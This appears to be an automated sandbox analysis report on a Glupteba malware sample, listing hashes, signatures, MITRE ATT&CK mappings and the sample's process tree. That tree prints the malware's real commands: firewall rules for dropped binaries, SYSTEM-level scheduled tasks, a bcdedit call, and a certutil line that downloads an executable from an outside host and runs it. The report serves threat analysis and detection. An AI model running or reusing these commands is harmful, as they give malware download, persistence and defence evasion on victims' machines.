Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-01-2023 16:20

General

  • Target

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe

  • Size

    4.0MB

  • MD5

    e006b2b08833a38314bad962b8e549eb

  • SHA1

    289e9b527460258ce38402604b82ab1784b93229

  • SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

  • SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • SSDEEP

    98304:rGCKnQtyq51ek1S7mP13ds372CfpMyc61mEy6Ti9Hvti2:rzKfS1ehmd3IZfpJc6HLTOHvp

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe
    "C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4972
    • C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe
      "C:\Users\Admin\AppData\Local\Temp\a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4184
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:1080
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\b5ea46465341\b5ea46465341\b5ea46465341.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3112
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\b5ea46465341\b5ea46465341\b5ea46465341.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:3808
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4356
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2376
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:2284
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:2832
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3444
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2556

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    4.0MB

    MD5

    e006b2b08833a38314bad962b8e549eb

    SHA1

    289e9b527460258ce38402604b82ab1784b93229

    SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

    SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • C:\Windows\rss\csrss.exe
    Filesize

    4.0MB

    MD5

    e006b2b08833a38314bad962b8e549eb

    SHA1

    289e9b527460258ce38402604b82ab1784b93229

    SHA256

    a11462c9d1e545b9a3172327282f1a30b801236ce4fef2b8a4149845ef1e4409

    SHA512

    2a4f4e47c909abfd6a59a38536b357d7ff84177094897ea2819fd87dfc07b239061395ce3fd5ffbbf14a2d709b34691f975adf598b7e89ee6b607289d0b87e03

  • memory/1080-139-0x0000000000000000-mapping.dmp
  • memory/2284-149-0x0000000000000000-mapping.dmp
  • memory/2376-147-0x0000000000000000-mapping.dmp
  • memory/2832-151-0x0000000000000000-mapping.dmp
  • memory/3112-141-0x0000000000000000-mapping.dmp
  • memory/3160-137-0x0000000000000000-mapping.dmp
  • memory/3444-153-0x0000000000000000-mapping.dmp
  • memory/3808-142-0x0000000000000000-mapping.dmp
  • memory/4184-135-0x0000000000000000-mapping.dmp
  • memory/4184-138-0x0000000004C76000-0x000000000501D000-memory.dmp
    Filesize

    3.7MB

  • memory/4184-140-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4184-146-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4356-150-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4356-148-0x0000000005200000-0x00000000055A7000-memory.dmp
    Filesize

    3.7MB

  • memory/4356-143-0x0000000000000000-mapping.dmp
  • memory/4356-154-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4972-136-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4972-132-0x0000000004D39000-0x00000000050E0000-memory.dmp
    Filesize

    3.7MB

  • memory/4972-134-0x0000000000400000-0x0000000002FDF000-memory.dmp
    Filesize

    43.9MB

  • memory/4972-133-0x00000000050F0000-0x00000000057E6000-memory.dmp
    Filesize

    7.0MB